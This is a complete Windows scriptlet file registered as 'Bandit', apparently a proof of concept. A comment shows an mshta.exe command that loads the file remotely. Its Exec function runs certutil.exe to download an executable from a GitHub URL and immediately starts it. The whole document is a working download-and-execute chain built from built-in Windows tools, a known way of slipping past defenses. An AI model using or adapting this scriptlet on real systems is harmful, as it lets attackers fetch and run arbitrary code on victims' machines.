<?XML version="1.0"?>
<scriptlet>
  <!-- Test -->
  <!-- mshta.exe javascript:a=(GetObject("raw_URL_of_this_file")).Exec();close(); -->

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[

	function Exec()
	{
		var r = new ActiveXObject("WScript.Shell").Run("cmd /c certutil.exe -urlcache -split -f https://github.com/void010/dummy/blob/main/cpp_poc.exe c:\cpp_poc.exe & start c:\cpp_poc.exe");
	}

]]>
</script>

</scriptlet>
